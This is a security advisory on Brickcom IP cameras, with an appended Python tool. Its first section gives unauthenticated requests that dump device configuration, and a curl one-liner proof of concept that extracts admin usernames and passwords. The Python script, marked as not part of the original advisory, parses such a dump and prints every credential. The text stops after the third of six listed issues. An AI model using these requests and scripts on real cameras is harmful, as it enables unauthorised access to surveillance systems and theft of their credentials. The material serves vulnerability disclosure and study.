                       _ _ _       _
  ___  _ ____      _____| | | | __ _| |__  ___
 / _ \| '__\ \ /\ / / _ \ | | |/ _` | '_ \/ __|
| (_) | |   \ V  V /  __/ | | | (_| | |_) \__ \
 \___/|_|    \_/\_/ \___|_|_|_|\__,_|_.__/|___/

                   Security Advisory 2016-04-12
                   www.orwelllabs.com   twt: @orwelllabs

sm1thw@0rw3lll4bs:~/bb# ./Bruce.S
[+] surveillance is the business model of the internet - OK!
sm1thw@0rw3lll4bs:~/bb# echo $?
6079

Advisory Information
====================
Vendor: Brickcom Corporation
CVE-Number: N/A
Advisory-URL: http://www.orwelllabs.com/2016/04/Brickcom-Multiple-Vulnerabilities.html
OLSA-ID: OLSA-2015-12-12
Impact: High (especially because some of these products are used in critical environments)
Remote: Yes

p4n0pt1c0n

I.   Insecure Direct Object Reference/Authentication Bypass
II.  Sensitive information in plaintext
III. Hard-coded Credentials
IV.  Cross-site scripting
V.   Basic Authentication
VI.  Cross-site Request Forgery

Background
----------
Brickcom describes itself as a "leading network video manufacturer in the IP surveillance industry. Dedicated to providing the best IP surveillance solutions with a solid foundation for engineering quality network video equipment with a Research and Development Department that has been producing wireless broadband networking equipment for over twenty years."

These products are used as video surveillance systems by customers in important sectors such as the Thai 4ir F0rce, as can be seen on the vendor's web site.

* notes:
  - some of the affected firmwares (see 'affected products') are very recent, launched only a few months ago, and still vulnerable, so this is a structural/legacy problem.
  - the sensitive information presented in this advisory is fake.

I.
Insecure Direct Object Reference/Authentication Bypass
---------------------------------------------------------

(+) affected scripts
    - configfile.dump
    - syslog.dump

- Path: Maintenance -> Configuration -> 'Export'

+ configfile.dump

An unauthenticated GET request to the script "configfile.dump", as follows:

http://xxx.xxx.xxx.xxx/configfile.dump?action=get

or like this

http://xxx.xxx.xxx.xxx/configfile.dump.backup
http://xxx.xxx.xxx.xxx/configfile.dump.gz

or just

http://xxx.xxx.xxx.xxx/configfile.dump

returns all camera settings:

[..code_snip..]
DeviceBasicInfo.firmwareVersion=v3.0.6.12
DeviceBasicInfo.macAddress=00:00:00:00:00:00
DeviceBasicInfo.sensorID=OV9X11
DeviceBasicInfo.internalName=Brickcom
DeviceBasicInfo.productName=Di-1092AX
DeviceBasicInfo.displayName=CB-1092AX
DeviceBasicInfo.modelNumber=XXX
DeviceBasicInfo.companyName=Brickcom Corporation
DeviceBasicInfo.comments=[CUBE HD IPCam STREEDM]
DeviceBasicInfo.companyUrl=www.brickcom.com
DeviceBasicInfo.serialNumber=AXNB02B211111
DeviceBasicInfo.skuType=LIT
DeviceBasicInfo.ledIndicatorMode=1
DeviceBasicInfo.minorFW=1
DeviceBasicInfo.hardwareVersion=
DeviceBasicInfo.PseudoPDseProdNum=P3301
AudioDeviceSetting.muted=0
[..code_snip..]

and all credentials, including the administrator account, like this:

UserSetSetting.userList.size=2
UserSetSetting.userList.users0.index=0
UserSetSetting.userList.users0.password=MyM4st3rP4ss      <<<--- admin pass
UserSetSetting.userList.users0.privilege=1
UserSetSetting.userList.users0.username=Cam_User          <<<--- admin user
UserSetSetting.userList.users1.index=0
UserSetSetting.userList.users1.password=C0mm0mP4ss        <<<--- (common) user pass
UserSetSetting.userList.users1.privilege=1
UserSetSetting.userList.users1.username=User_name         <<<--- (common) username
UserSetSetting.userList.users2.index=0
UserSetSetting.userList.users2.password=[..code_snip..]
[snip]
BasicNetworkSetting.pppoe.password=                  <<<--- pppoe pass
BasicNetworkSetting.pppoe.username=                  <<<--- pppoe user
UPnPSetting.enabled=1
UPnPSetting.name=CB-102Ap-1ffc3
Brickcom.enabled=1
DDNSSetting.dyndnsEnabled=0
DDNSSetting.dyndns.wildcardEnabled=0
DDNSSetting.dyndns.username=                         <<<--- dyndns user
DDNSSetting.dyndns.password=                         <<<--- dyndns password
DDNSSetting.dyndns.hostname=
DDNSSetting.tzodnsEnabled=0
DDNSSetting.tzodns.wildcardEnabled=0
DDNSSetting.tzodns.username=                         <<<--- and here...
DDNSSetting.tzodns.password=                         <<<--- here....
DDNSSetting.tzodns.hostname=
DDNSSetting.noipdnsEnabled=0
DDNSSetting.noipdns.wildcardEnabled=0
DDNSSetting.noipdns.username=                        <<<--- here
DDNSSetting.noipdns.password=                        <<<--- here
DDNSSetting.noipdns.hostname=

and many others...

- Path: System -> System Log -> 'Save to File'

+ syslog.dump

- Request: (unauthenticated)

GET http://xxx.xxx.xxx.xxx/syslog.dump?action=get

- Response:

[..code_snip..]
LOG_NOTICE-WebServer :User '[admin]' logged in to [web server], Sat Mar 1 21:13:36 2014
LOG_NOTICE-WebServer :User '[admin]' logged in to [web server], Sat Mar 1 21:11:02 2014
[..code_snip..]

Proof of Concept
`````````````````

Online Bash exploit-p0c:

curl -s -f -O http://xxx.xxx.xxx.xxx/configfile.dump && grep "users0" configfile.dump | awk -F. '{ print $4 }' || echo -e "[-] The target seems not to be vulnerable, Mr. Robot! \n"

(awk is given the dot as field separator on the command line; setting FS inside the action only takes effect from the second record on, so the first users0 line would print nothing. curl's -f makes an HTTP error count as "not vulnerable" instead of saving the error page as configfile.dump. Note that the fallback message is driven by curl's exit status: a successful download that simply contains no users0 entry prints nothing.)

IF the target (xxx.xxx.xxx.xxx) is vulnerable, the exploit will show a username, password and privilege level (1:admin), like this:

password=4adm1niS3cr3tP4ss
privilege=1
username=BrickcomADMIN

and a configfile.dump with all credentials, settings, etc. will be saved locally.

IF not vulnerable, you'll see the message:

"[-] The target seems not to be vulnerable, Mr. Robot!"

II. Sensitive information in plaintext
--------------------------------------

As shown above, there are countless cases where credentials and other sensitive information are stored in plaintext.

III.
Hard-coded Credentials
---------------------------

All credentials and other sensitive information can also be found in the HTML page user_management_config.html, just by viewing the HTML source code:

view-source:http://{xxx.xxx.xxx.xxx}/user_management_config.html
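Triage helper for the configfile.dump retrieved in section I, which also surfaces the plaintext credentials of section II. This is an added example, not part of the original advisory and not a Brickcom or Orwelllabs tool. It assumes only the dump shape shown above (flat key=value lines with dotted keys); the embedded sample dump is constructed for the example and, like the advisory's own values, is fake.

```python
"""Parse a Brickcom-style configfile.dump and pull out every credential.

Added example (not from the advisory or the vendor). The dump is a flat
key=value file whose keys are dotted paths, so a user record such as
UserSetSetting.userList.users0.{index,password,privilege,username} is
spread over several lines; this rebuilds those records and lists every
other field that carries a username or password (PPPoE, DDNS, ...).
"""
import re
import sys
from collections import defaultdict

# Constructed sample in the shape shown in section I; all values are fake.
SAMPLE_DUMP = """\
DeviceBasicInfo.firmwareVersion=v3.0.6.12
DeviceBasicInfo.productName=Di-1092AX
[..code_snip..]
UserSetSetting.userList.size=2
UserSetSetting.userList.users0.index=0
UserSetSetting.userList.users0.password=MyM4st3rP4ss
UserSetSetting.userList.users0.privilege=1
UserSetSetting.userList.users0.username=Cam_User
UserSetSetting.userList.users1.index=1
UserSetSetting.userList.users1.password=C0mm0mP4ss
UserSetSetting.userList.users1.privilege=0
UserSetSetting.userList.users1.username=User_name
BasicNetworkSetting.pppoe.username=isp-account
BasicNetworkSetting.pppoe.password=isp-secret
DDNSSetting.dyndnsEnabled=0
DDNSSetting.dyndns.username=
DDNSSetting.dyndns.password=
"""

# users<N>.<field>; the advisory shows privilege=1 for the admin account.
USER_KEY = re.compile(r"^UserSetSetting\.userList\.users(\d+)\.(\w+)$")


def parse_dump(text):
    """Map each 'key=value' line to a dict entry; blank and '[..snip..]' lines are skipped."""
    cfg = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("[") or "=" not in line:
            continue
        key, _, value = line.partition("=")  # only the first '=' separates key and value
        cfg[key.strip()] = value.strip()
    return cfg


def extract_users(cfg):
    """Rebuild per-user records from the flattened userList keys, ordered by index."""
    users = defaultdict(dict)
    for key, value in cfg.items():
        m = USER_KEY.match(key)
        if m:
            users[int(m.group(1))][m.group(2)] = value
    return [users[i] for i in sorted(users)]


def admin_accounts(cfg):
    """Accounts with privilege=1, the level the advisory labels as admin."""
    return [u for u in extract_users(cfg) if u.get("privilege") == "1"]


def find_credentials(cfg):
    """Every non-empty field whose last path element is a username or password."""
    return {k: v for k, v in cfg.items()
            if k.rsplit(".", 1)[-1].lower() in ("username", "password") and v}


if __name__ == "__main__":
    # Usage: python triage.py configfile.dump   (falls back to the constructed sample)
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_DUMP
    cfg = parse_dump(text)
    for u in extract_users(cfg):
        tag = "ADMIN" if u.get("privilege") == "1" else "user "
        print(f"[{tag}] {u.get('username')!r} / {u.get('password')!r}")
    for key, value in sorted(find_credentials(cfg).items()):
        if not key.startswith("UserSetSetting."):
            print(f"[cred ] {key} = {value!r}")
```

Run it against a dump saved by the curl one-liner above; empty fields (the disabled DDNS providers in the sample) are dropped, so the output is only the credentials actually worth rotating.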